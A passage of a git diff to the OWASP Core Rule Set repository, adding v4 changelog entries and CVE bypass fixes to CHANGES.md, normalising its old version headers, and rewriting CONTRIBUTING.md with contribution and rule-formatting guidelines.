ignore case of `PHP` tag in response text (953210 PL1) (Felipe Zipitría) [#2664] + * feat: extend rule to detect IIS errors via automation of pattern updates (954120 PL1) (Felipe Zipitría) [#2810] + * fix: log response body to audit log only when full rule chain matches (954130 PL1) (Franziska Bühler) [#2202] + * feat: added new webshells and tests (955100 PL1) (Jozef Sudolský) [#3405] + * feat: extend data file to include additional web shells (web-shells-php.data, 955100 PL1) (Jitendra Patro) [#3215] + * feat: extend data file to include additional web shells (web-shells-php.data, 955100 PL1) (Jozef Sudolský) [#2687] + * fix: make regular expression more strict to reduce noise in logs (955120 PL1) (Jozef Sudolský) [#2315] + * fix: use correct variable in chained condition for correlation rules (980120 PL0, 980150 PL0) (Simon Studer) [#1898] + +Changes without direct rule impact: + * chore: improve changelog-pr workflow (Max Leske) [#3416] + * chore: generate changelog entries with leading space (Max Leske) [#3550] + * chore: move regexp-assembly to separate directory (Felipe Zipitría) [#2327] + * chore: parse changelog PR author names from contributors (Max Leske) [#3408] + * docs: add a note to a commented rule about unsupported action in v3 (Ervin Hegedus) [#2098] + * docs: add documentation on blocking of archive file extensions that are not blocked by default (Andrew Howe) [#2758] + * docs: add example exclusion rule for monitoring agents (Andrea Menin) [#2037] + * docs: add file sponsors.md (Christian Folini) [#2174] + * docs: add link to run tests (Ervin Hegedus) [#3438] + * docs: add link to slack invitation to README (Christian Folini) [#2122] + * docs: add missing PL tags to all rules (Ervin Hegedus) [#1882] + * docs: add note of lack of rule range support in ModSecv3 (Andrew Howe) [#3303] + * docs: add to CONTRIBUTING.MD chain rule commenting guidance (Ervin Hegedus) [#3196] + * docs: align actions in right order (Ervin Hegedus) [#2237] + * docs: bring CONTRIBUTING.MD in line with documentation (Andrew Howe) [#2558] + * docs: change documentation git module link to https (İlteriş Eroğlu) [#2461] + * docs: change-version: fix typo (Deepshikha Sinha) [#2430] + * docs: contributing.md: add more information for new developers (Andrew Howe) [#2487] + * docs: crs-setup.conf: add note to allowed_request_content_type settings (Ervin Hegedus) [#2164] + * docs: enhance installation process for Nginx / IIS (Jozef Sudolský) [#1988] + * docs: explained to leave audit log settings alone in CONTRIBUTING.md (Christian Folini) [#3090] + * docs: fix capec id for crawlers (Jozef Sudolský) [#2258] + * docs: fix changed Trustwave URLs (Elia Pinto, henkworks, Felipe Zipitría) [#2213, #2364, #2204] + * docs: fix docs for Apache (Jozef Sudolský) [#2238] + * docs: fix donate URL (Felipe Zipitría) [#2132] + * docs: fixed minor typo in comment in file rules/restricted-files.data (Homesteady) [#3305] + * docs: fix NextCloud example comments (Joost de Keijzer) [#2282] + * docs: fix ruleid typos in comments (Paul Beckett) [#2263] + * docs: fix stricter sibling comment for SQL Injection () (Stephen Sigwart) [#1913] + * docs: fix typo in initialization(Elia Pinto) [#2366] + * docs: fix typo in sampling mode description (Christian Folini) [#2090] + * docs: fix typos across the entire project as reported by codespell (Ervin Hegedus) [#2519] + * docs: fix typos in README (Priyam Patel) [#2494] + * docs: improve changelog organization (Christian Folini) [#3536] + * docs: missing space after comment mark (Ervin Hegedus) [#2097] + * docs: update OWASP Slack URL (Jozef Sudolský) [#2056] + * docs: remove 'log' from rules and let SecDefaultAction decide what to do (Federico G. Schwindt) [#1876] + * docs: replace terms Blacklist and Whitelist with Deny list and Allow list (Paul Beckett) [#2137] + * docs: reword comment (900300 config) (Christian Folini) [#3417] + * docs: reword contributing.md (Christian Folini) [#2077] + * docs: sync CONTRIBUTING.MD with HTML version (Andrew Howe) [#3301] + * docs: transferred CHANGES to CHANGES.md (Felipe Zipitría) [#2606] + * docs: update and tidy CHANGES.md file for v4.0 release (Andrew Howe, Max Leske) [#3540] + * docs: update CONTRIBUTORS.md for new release (Ervin Hegedus) [#3340] + * docs: update description of rule 920350 (Christian Folini) [#1952] + * docs: update documentation hyperlinks on rules (Dexter Chang) [#3232] + * docs: update links and format of known bugs (Felipe Zipitría) [#2186] + * docs: update OWASP vulnerability URLs (Walter Hop) [#2467] + * docs: update policy to include signed releases (Felipe Zipitría) [#2465] + * docs: update README for Nginx (vijayasija99) [#2158] + * docs: update SPONSORS.md for new release (Christian Folini) [#3341] + * docs: remove sponsor F5 / VMWare (Christian Folini) [#3555] + * feat: add consistent rule references to initialization rule comments (Andrew Howe) [#2813] + * feat: add editorconfig file to keep spacing in good shape (Felipe Zipitría) [#2407] + * feat: add timezone variable to docker-compose (Felipe Zipitría) [#1995] + * fix: indentations (Ervin Hegedus) [#1851] + * fix: link for docs/OWASP-CRS-Documentation submodule (Ervin Hegedus) [#1885] + * fix: multiple fixes when generating changelog PR (Max Leske) [#3418], [#3420], [#3422], [#3424] [#3429] + * fix: nginx logging in docker-compose (Felipe Zipitría) [#2036] + * fix: remove all whitespace at EOL (Felipe Zipitría) [#2405, #2406] + * fix: remove full stop from end of log message (920181 PL1) (Federico G. Schwindt) [#2011] + * fix: yamllint (Felipe Zipitría) [#2387] + * tests: add a Chrome and Firefox version 100 UA (Mike Taylor) [#2325] + * tests: add common and uniform http headers to tests (Felipe Zipitría) [#2362] + * tests: additional tests for use in PHP wrappers in PHP injection attacks (rule 933200 PL1) (Andrew Howe) [#2723] + * tests: add positive test 920100-16 for rule 920100 PL1 (Andrew Howe) [#2952] + * tests: add positive test 920190-3 for rule 920190 PL1 (Andrew Howe) [#2956] + * tests: add positive test 920250-4 for rule 920250 PL1 (Andrew Howe) [#2971] + * tests: add positive test 920340-3 for rule 920340 PL1 (Andrew Howe) [#2972] + * tests: add positive test 920470-18 for rule 920470 PL1 (Andrew Howe) [#3058] + * tests: add positive test 921120-4 for rule 921120 PL1 (Andrew Howe) [#3083] + * tests: add positive test 921150-2 for rule 921150 PL1 (Andrew Howe) [#3158] + * tests: add positive test 932160-8 for rule 932160 PL1 (Christian Folini) [#2997] + * tests: add test against FP when using urlDecode for 932140 (Max Leske) [#2191] + * tests: add test for rule 941130 PL1 (Paul Beckett) [#2923] + * tests: add test for rule 941140 PL1 (Franziska Bühler) [#2995] + * tests: add test for rule 941170 PL1 (Franziska Bühler) [#2994] + * tests: add test for rule 941200 PL1 (Franziska Bühler) [#2993] + * tests: add test for rule 941240 PL1 (Franziska Bühler) [#2975] + * tests: add test for rule 941310 PL1 (Franziska Bühler) [#2974] + * tests: add test for rule 941400 PL1 (Franziska Bühler) [#2969] + * tests: add test for rule 942170 PL1 (Franziska Bühler) [#2968] + * tests: add test for rule 942270 PL1 (Franziska Bühler) [#2967] + * tests: add test for rule 942350 PL1 (Franziska Bühler) [#2965] + * tests: add test for rule 942500 PL1 (Franziska Bühler) [#2964] + * tests: add test for rule 942520 PL2 (Franziska Bühler) [#2706] + * tests: add test for rule 943100 PL1 (Franziska Bühler) [#2962] + * tests: add test for `sql_compileoption_used` detection (rule 942151 PL1) (Andrew Howe) [#2714] + * tests: add tests for 920120 (Max Leske) [#2369] + * tests: add tests for 920121, 932150, 932160, 932120, 932130, 921151 (Paul Beckett) [#2264, #2275, #2276, #2272, #2273, #2270] + * tests: add tests for 920275, 913101, 913102, 920410, 920171, 932190, 932110, 932105 (Ervin Hegedus) [#2021, #2253, #2257, #2294, #2295, #2285, #2286, #2287] + * tests: add tests for 920341 (Juan-Pablo Tosso) [#2266] + * tests: add tests for 921180 (Juan-Pablo Tosso, Christian Folini) [#2308] + * tests: add tests for 932170, 932171, 932106, 932180, 942170, 942251, 942460 (Franziska Bühler) [#2252, #2254, #2255, #2280, #2283, #2284, #2269, #2268] + * tests: add tests for 933111, 933190, 933200 (NiceYouKnow) [#2281] + * tests: add tests for FP 921110 request smuggling (Franziska Bühler) [#2102] + * tests: add tests for rules 942521 and 942522 PL2 (Franziska Bühler) [#2708] + * tests: add test to prove we cover complex shell variables usage in rule 932230 (Felipe Zipitría) [#2966] + * tests: clean up quoting (Max Leske) [#2370] + * tests: deprecate ftw in favor of go-ftw (Felipe Zipitría) [#3076] + * tests: detection of \*nix RCE using multiple variable assignments (932200 PL2) (Christian Folini) [#2899] + * tests: enable UTF8 encoding validation (Felipe Zipitría) [#2992] + * tests: extend coverage for rule 932120 (Felipe Zipitría) [#2996] + * tests: extend coverage for rule 932200 (Felipe Zipitría) [#2950] + * tests: extend coverage for rule 932220 (Felipe Zipitría) [#3063] + * tests: fix 933160-21 and 942500-1 due to invalid URI (Takaya Saeki) [#2168] + * tests: fix duplicated tests for rule 934130 PL1 (Walter Hop) [#2918] + * tests: fixed end boundary in 932180-2 (Ervin Hegedus) [#2377] + * tests: fixed URLs tests for rule 932130 PL1 (Matteo Pace) [#2880] + * tests: fixed URLs tests for rules 934130 PL1 and 934131 PL2 (Matteo Pace) [#3133] + * tests: fix logging problem for Nginx (vijayasija99) [#2157] + * tests: fix Python version for tests (Max Leske) [#2247] + * tests: fix requirements version (nobletrout) [#2004] + * tests: fix tests lacking charset (Felipe Zipitría) [#1932] + * tests: fix tests on rule 932200 to detect FPs (Max Leske) [#3309] + * tests: fix test titles (bxlxx.wu, Ervin Hegedus) [#2504, #2497] + * tests: fix test using old syntax and add go-ftw check (Felipe Zipitría) [#2715] + * tests: improve test setup, rewrite of log checker (Max Leske) [#2363] + * tests: increase tests (920280-3, 920430-3, 920430-9) compatibility with other proxies (Matteo Pace) [#3134] + * tests: normalized keys in test files (Ervin Hegedus) [#2493] + * tests: rearranged tests for rule 920340 (Christian Folini) [#3089] + * tests: rearranged tests for rule 920400 PL1 (Matteo Pace) [#2877] + * tests: remove Accept-Charset from test files (Felipe Zipitría) [#2781] + * tests: remove broken test 932100-3 (Felipe Zipitría) [#2165] + * tests: use only valid YAML (Felipe Zipitría) [#2080] + * tests: use same user-agent (Felipe Zipitría) [#2393] + +Functionality that has been moved to plugins for this release: + * feat: add Google OAuth 2 exclusion plugin (Jozef Sudolský) [#2388] + * feat: add phpBB exclusion rules (now a plugin) (Jozef Sudolský) [#1893] + * feat: add phpMyAdmin exclusion rules (now a plugin) (Jozef Sudolský) [#1951] + * feat: move IP reputation rules to plugins (Simon Studer) [#2482] + * feat: move exclusion profiles and DOS rules to plugins (Andrew Howe) [#2469] + * feat: ownCloud: Fix rule 9003001 to match both DAV and WebDAV (now a plugin) (Abu Dawud) [#2130] + * fix: nextcloud: fix FPs (now a plugin) (kam821, Jozef Sudolský, ntimo, Felipe Zipitría, pyllyukko) [#1840, #1843, #1847, #1946] + * fix: phpBB: Fix FPs (now a plugin) (Jozef Sudolský) [#2057, #2180, #2299, #2343] + * fix: phpMyAdmin: Fix FPs (now a plugin) (Jozef Sudolský) [#2172, #2249, #2321, #2351] + * fix: replace ARGS by ARGS_GET in rules in phase:1 (various rule exclusion rules) (Ervin Hegedus) [#2063] + * fix: wordPress: fix FPs (now a plugin) (Jozef Sudolský) [#1899, #1971, #2320] + * fix: wordPress: fix FPs and improve performance (now a plugin) (Walter Hop) [#1997, #2311] + * fix: wordPress: fix FPs in Site Health page (now a plugin) (Robert de Boer, Fregf, Walter Hop) [#1895, #1920] + * fix: xenForo: fix FPs (now a plugin) (Walter Hop, ThanhPT) [#1844, #1865, #1894, #1998, #2421] + +## Version 3.3.5 - 2023-07-18 + +Important changes: + +* Backport fix for CVE-2023-38199 from CRS v4 via new rule 920620 (Andrea Menin, Felipe Zipitría) + +Fixes: + +* Fix paranoia level-related scoring issue in rule 921422 (Walter Hop) +* Move auditLogParts actions to the end of chained rules where used (Ervin Hegedus) + +Chore: + +* Clean up redundant paranoia level tags (Ervin Hegedus) +* Clean up YAML test files to support go-ftw testing framework (Felipe Zipitría) +* Move testing framework from ftw to go-ftw (Felipe Zipitría) + +## Version 3.3.4 - 2022-09-20 + +Fixes and improvements: + +* Fix a regression in our former release, with the impact that some Paranoia Level 2 rules would activate even when running in Paranoia Level 1. (Simon Studer, Walter Hop) + +## Version 3.3.3 - 2022-09-19 + +Important changes: + +* This update requires ModSecurity version 2.9.6 or 3.0.8 (or an updated version with backports of the security fixes in these versions) or a compatible engine supporting these changes. If you do not upgrade ModSecurity, the file REQUEST-922-MULTIPART-ATTACK.conf will cause ModSecurity to fail to start. In that case, you can temporarily delete that file. However, you will be missing protection from these rules. Therefore, we recommend upgrading your ModSecurity or other engine instead. +* By default, the request headers "Accept-Charset" and "Content-Encoding" are now blocked to prevent a WAF bypass. Especially the "Accept-Charset" header may be in use by clients. If you need to serve clients that send this header, uncomment and edit rule 900250 in crs-setup.conf. + +Fixes and improvements: + +* Fix CVE-2022-39955 Multiple charsets defined in Content-Type header (Jan Gora) +* Fix CVE-2022-39956 Content-Type or Content-Transfer-Encoding MIME header fields abuse (Jan Gora, Felipe Zipitria) +* Fix CVE-2022-39957 Charset accept header field resulting in response rule set bypass (Karel Knibbe, Max Leske) +* Fix CVE-2022-39958 Small range header leading to response rule set bypass (Hussein Daher, Christian Folini) +* Fix MIME header abuse via _charset_ field (Jan Gora, Felipe Zipitria) +* Fix bypass using deflated request body (Karel Knibbe) +* Fix request body partial rule set bypass via Content-Type "text/plain" (Pinaki Mondal, Andrea Menin) +* Fix XML Body Parser abuse for non-XML request bodies (Jan Gora) +* Fix body processor bypass by content-type outside the mime type declaration (Jan Gora, Simon Studer, Ervin Hegedus) + +## Version 3.3.2 - 2021-06-30 + +Fixes and improvements: + * Fix CVE-2021-35368 WAF bypass using pathinfo (Christian Folini) + +## Version 3.3.0 - 2020-07-01 Important changes: * The format of crs-setup.conf variable "tx.allowed_request_content_type" has been changed to be more in line with the other variables. If you have overridden this variable, please see the example in crs-setup.conf for the new separator to use. @@ -43,7 +598,7 @@ Fixes and improvements: * Fix GHA badges (Federico G. Schwindt) * feat(badge): add apache license badge * fix typos found by fossies codespell (Tim Herren) - * Decrease processing time of rules (Ervin Hegedüs) + * Decrease processing time of rules (Ervin Hegedus) * handle multiple directives in 920510 (Andrea Menin) * handle multiple directives in 920510 (Andrea Menin) * fix(ci): use log_contains instead (Felipe Zipitria) @@ -60,7 +615,7 @@ Fixes and improvements: * Remove outdated Travis status after migration (Christian Folini) * feat(ci): adds github actions testing (Felipe Zipitria) * fix(migration): post migration tasks (Felipe Zipitria) - * feat(templates): add text to gihub templates about migration. To be reverted after migation is done. (Felipe Zipitria) + * feat(templates): add text to github templates about migration. To be reverted after migration is done. (Felipe Zipitria) * Added more explanations to comment of 920300 (Christian Folini) * Added 'ver' action with current version to all necessary rules (Ervin Hegedus) * Update nextcloud excl rules and shorten var (Franziska Bühler) @@ -86,7 +641,7 @@ Fixes and improvements: * Fix FPs for 942350 (#1706) (Franziska Bühler) * Fix typos found by codespell / Fossies project (#1702) (Simon Studer) * Ignore check of CT header in POST request if protocol is HTTP/2 (Ervin Hegedus) - * Narrowing down the subpattern .*? in 941130 (Christian Folini) + * Narrowing down the subpattern .\*? in 941130 (Christian Folini) * Restricting a wide regex a bit (Christian Folini) * Drop escapes (Christian Folini) * Fix FP in 941130 and rearrange regex with new regex-assemble file (Christian Folini) @@ -165,14 +720,14 @@ Fixes and improvements: * Fix typo and add 2 new entries to 941160 (Franziska Bühler) * Switch to dates in YYYY-MM-DD format IOW iso 8601. While here add newlines and drop empty categories. (Federico G. Schwindt) * Update badges, add v3.3 and remove v3.0 (#1557) (Federico G. Schwindt) - * Rearange characters and add positive and negative test cases. Moved the dash to the end of the character set to avoid escaping it. Added test with all the new characters and a test for multiple whitespaces. Allowed a previously blocked charset. (Tim Herren) + * Rearrange characters and add positive and negative test cases. Moved the dash to the end of the character set to avoid escaping it. Added test with all the new characters and a test for multiple whitespaces. Allowed a previously blocked charset. (Tim Herren) * 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) * Fix bypass in 931130 Don't rely on beginsWith as it might allow attackers to create subdomains matching the prefix. Add tests to cover this and other cases. The latter fixes #1404. (Federico G. Schwindt) * fix rule regex due to remove t:removeComments (Andrea Menin) * 920470: include chars from rfc 2046 RFC 2046 allows additional chars for the boundary. \d removed as it is covered by \w in the regex. Removed unnecessary escapes. (Tim Herren) * update Dockerfiles and Travis to use v3.3/dev (Walter Hop) -== Version 3.2.0 - 2019-09-24 == +## Version 3.2.0 - 2019-09-24 New functionality: * Add AngularJS client side template injection 941380 PL2 (Franziska Bühler) @@ -271,7 +826,7 @@ Fixes and improvements: * INSTALL: advise to use release zips, remove upgrade.py, update Nginx (Walter Hop) * Java: change tag from COMMAND_INJECTION to JAVA_INJECTION (Manuel Spartan) * Jwall auditconsole outbound anomaly scoring requirements (Christoph Hansen) - * Mark patterns not supported by re2 (Federico G. Schwindt) + * Mark patterns not supported by RE2 (Federico G. Schwindt) * Move duplicated 900270 to 900280 Fixes #1236. (Federico G. Schwindt) * Move PROXYLOCATION var (Franziska Bühler) * PHP: move get_defined_functions() and friends into PL1 (Walter Hop) @@ -339,7 +894,7 @@ Documentation: * Update README.md (Rufus125) * Updating crs site location (Chaim Sanders) -== Version 3.1.1 - 2019-06-26 == +## Version 3.1.1 - 2019-06-26 * Fix CVE-2019-11387 ReDoS against CRS on ModSecurity 3 at PL 2 (Christoph Hansen, Federico G. Schwindt) * Content-Type made case insensitive in 920240, 920400 (Federico G. Schwindt) @@ -349,7 +904,7 @@ Documentation: * Reduce false positives in 921110 (Yu Yagihashi, Federico G. Schwindt) * Fix bug in 943120 (XeroChen) -== Version 3.1.0 - 2018-08-07 == +## Version 3.1.0 - 2018-08-07 * Add Detectify scanner (Andrea Menin) * Renaming matched_var/s (Victor Hora) @@ -375,7 +930,7 @@ Documentation: * Fix bypass caused by multiple spaces in RCE rules (Walter Hop) * Remove unneeded regex capture groups (Federico G. Schwindt) * Add built-in exceptions for CPanel (Christoph Hansen) - * Add additional file restrictios for ws_ftp, DS_Store... (Jose Nazario) + * Add additional file restrictions for ws_ftp, DS_Store... (Jose Nazario) * Fix missing strings in 942410 (Franziska Bühler) * Add 2 missing PDO errors (Christoph Hansen) * Fix issues with FPs in regression tests (Chaim Sanders) @@ -452,12 +1007,12 @@ Documentation: * Removed deprecated t:removeComments from 942100 (Christian Folini) * Add word boundary to rule 942410 (Franziska Bühler) -== Version 3.0.2 - 2017-05-12 == +## Version 3.0.2 - 2017-05-12 * Remove debug rule that popped up in 3.0.1 (Christian Folini) -== Version 3.0.1 - 2017-05-09 == +## Version 3.0.1 - 2017-05-09 * SECURITY: Removed insecure handling of X-Forwarded-For header; reported by Christoph Hansen (Walter Hop) @@ -494,7 +1049,7 @@ Documentation: * Fixed bug with DoS rule 912160 (@loudly-soft, Christian Folini) -== Version 3.0.0 - 2016-11-10 == +## Version 3.0.0 - 2016-11-10 Huge changeset running in separate branch from September 2013 to September 2016. This is a cursory summary of the most important changes: @@ -567,7 +1122,7 @@ This is a cursory summary of the most important changes: * Many improvements to rules in 2014/5 (Ryan Barnett) -== Version 2.2.9 - 2013-09-30 == +## Version 2.2.9 - 2013-09-30 Improvements: * Updated the /util directory structure @@ -579,10 +1134,10 @@ Bug Fixes: https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/157 -== Version 2.2.8 - 2013-06-30 == +## Version 2.2.8 - 2013-06-30 Improvements: -* Updatd the /util directory structure +* Updated the /util directory structure * Added scripts to check Rule ID duplicates * Added script to remove v2.7 actions so older ModSecurity rules will work - https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/43 @@ -608,7 +1163,7 @@ Bug Fixes: - https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/18 -== Version 2.2.7 - 2012-12-19 == +## Version 2.2.7 - 2012-12-19 Improvements: * Added JS Overrides file to identify successful XSS probes @@ -623,7 +1178,7 @@ Bug Fixes: * Fixed bug in XSS rules checking TX:PM_XSS_SCORE variable -== Version 2.2.6 - 2012-09-14 == +## Version 2.2.6 - 2012-09-14 Improvements: * Started rule formatting update for better readability @@ -644,7 +1199,7 @@ Bug Fixes: https://www.modsecurity.org/tracker/browse/CORERULES-78 -== Version 2.2.5 - 2012-06-14 == +## Version 2.2.5 - 2012-06-14 Security Fixes: * Updated the anomaly scoring value for rule ID 960000 to critical @@ -668,7 +1223,7 @@ Bug Fixes: * Added forceRequestBodyVariable action to rule ID 960904 -== Version 2.2.4 - 2012-03-14 == +## Version 2.2.4 - 2012-03-14 Improvements: * Added Location and Set-Cookie checks to Response Splitting rule ID 950910 @@ -681,10 +1236,10 @@ Improvements: Bug Fixes: * Fixed missing comma before severity action in rules 958291, 958230 and 958231 -* Fixed duplidate rule IDs +* Fixed duplicate rule IDs -== Version 2.2.3 - 2011-12-19 == +## Version 2.2.3 - 2011-12-19 Improvements: * Added Watcher Cookie Checks to optional_rules/modsecurity_crs_55_appication_defects.conf file @@ -700,7 +1255,7 @@ Bug Fixes: * Updated the regex and added tags for RFI rules. -== Version 2.2.2 - 2011-09-28 == +## Version 2.2.2 - 2011-09-28 Improvements: @@ -719,7 +1274,7 @@ Bug Fixes: * Updated the SQLi regex for rule ID 981242 -== Version 2.2.1 - 2011-07-20 == +## Version 2.2.1 - 2011-07-20 Improvements: @@ -740,7 +1295,7 @@ Bug Fixes: * Updated rule ID 971150 signature to remove ; -== Version 2.2.0 - 2011-05-26 == +## Version 2.2.0 - 2011-05-26 Improvements: @@ -755,7 +1310,7 @@ Improvements: * Added new Application Defect checks (55 app defect file) from Watcher tool (Check Charset) http://websecuritytool.codeplex.com/wikipage?title=Checks#charset * Added new AppSensor rules to experimental_dir - https://www.owasp.org/index.php/AppSensor_DetectionPoints + https://owasp.org/www-project-appsensor/ * Added new Generic Malicious JS checks in outbound content * Added experimental IP Forensic rules to gather Client hostname/whois info http://blog.spiderlabs.com/2010/11/detecting-malice-with-modsecurity-ip-forensics.html @@ -790,7 +1345,7 @@ Bug Fixes: They will now inherit the settings from the SecDefaultAction -== Version 2.1.2 - 2011-02-17 == +## Version 2.1.2 - 2011-02-17 Improvements: @@ -804,7 +1359,7 @@ Bug Fixes: * Added missing " in the skipAfter SecAction in the CC Detection rule set -== Version 2.1.1 - 2010-12-30 == +## Version 2.1.1 - 2010-12-30 Bug Fixes: @@ -817,7 +1372,7 @@ Bug Fixes: * Moved the comment spam data file into the optional_rules directory -== Version 2.1.0 - 2010-12-29 == +## Version 2.1.0 - 2010-12-29 Improvements: @@ -848,7 +1403,7 @@ Improvements: -== Version 2.0.10 - 2010-11-29 == +## Version 2.0.10 - 2010-11-29 Improvements: @@ -862,7 +1417,7 @@ Bug Fixes: -== Version 2.0.9 - 2010-11-17 == +## Version 2.0.9 - 2010-11-17 Improvements: @@ -897,7 +1452,7 @@ Bug Fixes: https://www.modsecurity.org/tracker/browse/CORERULES-62 -== Version 2.0.8 - 2010-08-27 == +## Version 2.0.8 - 2010-08-27 Improvements: @@ -920,7 +1475,7 @@ Bug Fixes: https://www.modsecurity.org/tracker/browse/CORERULES-29 -== Version 2.0.7 - 2010-06-04 == +## Version 2.0.7 - 2010-06-04 Improvements: @@ -947,7 +1502,7 @@ Bug Fixes: * Fixed restricted_extension false positive by adding boundary characters -== Version 2.0.6 - 2010-02-26 == +## Version 2.0.6 - 2010-02-26 Bug Fixes: @@ -966,7 +1521,7 @@ Bug Fixes: * Update phpids filters to use pass action instead of block -== Version 2.0.5 - 2010-02-01 == +## Version 2.0.5 - 2010-02-01 Improvements: @@ -985,7 +1540,7 @@ Improvements: * Updated HTTP Parameter Pollution (HPP) rule logic to concat data into a TX variable for inspection * Removed TX inspections for generic attacks and reverted to standard ARGS inspection https://www.modsecurity.org/tracker/browse/MODSEC-120 -* Updated the variable list for standard inspections (ARGS|ARGS_NAMES|XML:/*) and moved the other +* Updated the variable list for standard inspections (ARGS|ARGS_NAMES|XML:/\*) and moved the other variables to the PARANOID list (REQUEST_URI|REQUEST_BODY|REQUEST_HEADERS|TX:HPP_DATA) * Moved converted ET Snort rules to the /optional_rules directory * Created a new Header Tagging ruleset (optional_rules) that will add matched rule data to the @@ -1006,7 +1561,7 @@ Bug Fixes: and blocking -== Version 2.0.4 - 2009-11-30 == +## Version 2.0.4 - 2009-11-30 Improvements: @@ -1023,7 +1578,7 @@ Bug Fixes: phase:4 which would allow for blocking based on information leakage issues. -== Version 2.0.3 - 2009-11-05 == +## Version 2.0.3 - 2009-11-05 Improvements: @@ -1047,7 +1602,7 @@ Bug Fixes: https://www.modsecurity.org/tracker/browse/CORERULES-23 -== Version 2.0.2 - 2009-09-11 == +## Version 2.0.2 - 2009-09-11 Improvements: @@ -1059,7 +1614,7 @@ Bug Fixes: https://www.modsecurity.org/tracker/browse/CORERULES-15 -== Version 2.0.1 - 2009-08-07 == +## Version 2.0.1 - 2009-08-07 Improvements: @@ -1077,7 +1632,7 @@ Bug Fixes: https://www.modsecurity.org/tracker/browse/CORERULES-9 -== Version 2.0.0 - 2009-07-29 == +## Version 2.0.0 - 2009-07-29 New Rules & Features: @@ -1095,7 +1650,7 @@ New Rules & Features: logging and disruptive actions to take based on the score. * Correlated Events There are rules in phase:5 that will provide some correlation between inbound - events and outbound events and will provide a result of successful atttack or + events and outbound events and will provide a result of successful attack or attempted attack. * Updated Severity Ratings The severity ratings in the rules have been updated to the following: @@ -1175,7 +1730,7 @@ Other Fixes: rules and chained rules). -== Version 1.6.1 - 2008-04-22 == +## Version 1.6.1 - 2008-04-22 * Fixed a bug where phases and transformations where not specified explicitly @@ -1183,7 +1738,7 @@ Other Fixes: recommend to upgrade. -== Version 1.6.0 - 2008-02-19 == +## Version 1.6.0 - 2008-02-19 New Rulesets & Features: @@ -1221,7 +1776,7 @@ Additional rules logic: -== Version 1.5.1 - 2007-12-06 == +## Version 1.5.1 - 2007-12-06 False Positives Fixes: @@ -1238,7 +1793,7 @@ Other Fixes: * File 55 contained empty regular expressions. Fixed. -== Version 1.5 - 2007-11-23 == +## Version 1.5 - 2007-11-23 New Rulesets: @@ -1309,7 +1864,7 @@ version 1.4 build 2 - 2007-05-17 New Feature: * Search for signatures in XML content - XML Content will be parsed and ispected for signatures + XML Content will be parsed and inspected for signatures New Events: * 950116 - Unicode Full/Half Width Abuse Attack Attempt @@ -1373,14 +1928,14 @@ Fixed apache 2.4 dummy requests exclusion Added persistent PDF UXSS detection rule -== Version 1.3.2 build 3 2007-01-10 == +## Version 1.3.2 build 3 2007-01-10 Fixed regular expression in rule 960010 (file #30) to allow multipart form data content -== Version 1.3.2 - 2006-12-27 == +## Version 1.3.2 - 2006-12-27 New events: @@ -1394,7 +1949,7 @@ Regular expressions fixes: * The command injection wget is not searched in the UA header as it has different meaning there. * LDAP Fixed to reduce FPs: + More accurate regular expressions - + high bit characters not accpeted between signature tokens. + + high bit characters not accepted between signature tokens. * Do not detect The CRS project values third party contributions. To make the contribution process as easy as possible, a helpful set of contribution guidelines are in place which all contributors and developers are asked to adhere to. -* You will need a [GitHub account](https://github.com/signup/free). -* Submit a [ticket for your issue](https://github.com/SpiderLabs/owasp-modsecurity-crs/issues), assuming one does not already exist. - * Clearly describe the issue including steps to reproduce when it is a bug. - * Make sure you specify the version that you know has the issue. - * Bonus points for submitting a failing test along with the ticket. -* If you don't have push access, fork the repository on GitHub. +## Getting Started with a New Contribution + +1. Sign in to [GitHub](https://github.com/join). +2. Open a [new issue](https://github.com/coreruleset/coreruleset/issues) for the contribution, *assuming a similar issue doesn't already exist*. + * **Clearly describe the issue**, including steps to reproduce if reporting a bug. + * **Specify the CRS version in question** if reporting a bug. + * Bonus points for submitting tests along with the issue. +3. Fork the repository on GitHub and begin making changes there. +4. Signed commits are preferred. (For more information and help with this, refer to the [GitHub documentation](https://docs.github.com/en/authentication/managing-commit-signature-verification/signing-commits)). ## Making Changes -* Please base your changes on branch ```v3.3/dev``` -* Create a topic branch for your feature or bug fix. -* Please fix only one problem at a time; this will help to quickly test and merge your change. If you intend to fix multiple unrelated problems, please use a separate branch for each problem. +* Base any changes on branch `main`. +* Create a topic branch for each new contribution. +* Fix only one problem at a time. This helps to quickly test and merge submitted changes. If intending to fix *multiple unrelated problems* then use a separate branch for each problem. * Make commits of logical units. -* Make sure your commits adhere to the rules guidelines below. -* Make sure your commit messages are in the [proper format](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html): The first line of the message should have 50 characters or less, separated by a blank line from the (optional) body. The body should be wrapped at 70 characters and paragraphs separated by blank lines. Bulleted lists are also fine. +* Make sure commits adhere to the contribution guidelines presented in this document. +* Make sure commit messages follow the [standard Git format](http://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html). +* Make sure changes are submitted as a pull request (PR) on [GitHub](https://github.com/coreruleset/coreruleset/pulls). + * PR titles should follow the [Conventional Commits format](https://www.conventionalcommits.org/en/v1.0.0/), for example: `fix(rce): Fix a FP in rule 912345 with keyword 'time'`. + * If a PR only affects a single rule then the rule ID should be included in the title. + * If a PR title does not follow the correct format then a CRS developer will fix it. + +## General Formatting Guidelines for Rules Contributions + +* American English should be used throughout. +* 4 spaces should be used for indentation (no tabs). +* Files must end with a single newline character. +* No trailing whitespace at EOL. +* No trailing blank lines at EOF (only the required single EOF newline character is allowed). +* Adhere to an 80 character line length limit where possible. +* Add comments where possible and clearly explain any new rules. +* Comments must not appear between chained rules and should instead be placed before the start of a rule chain. +* All [chained rules](https://github.com/owasp-modsecurity/ModSecurity/wiki/Reference-Manual-(v2.x)#chain) should be indented like so, for readability: +``` +SecRule .. .. \ + "..." + SecRule .. .. \ + "..." + SecRule .. .. \ + "..." +``` +- Action lists in rules must always be enclosed in double quotes for readability, even if there is only one action (e.g., use `"chain"` instead of `chain`, and `"ctl:requestBodyAccess=Off"` instead of `ctl:requestBodyAccess=Off`). +- Always use numbers for phases instead of names. +- Format all use of `SecMarker` using double quotes, using UPPERCASE, and separating words with hyphens. For example: +``` +SecMarker "END-RESPONSE-959-BLOCKING-EVALUATION" +SecMarker "END-REQUEST-910-IP-REPUTATION" +``` +- Rule actions should appear in the following order, for consistency: +``` +id +phase +allow | block | deny | drop | pass | proxy | redirect +status +capture 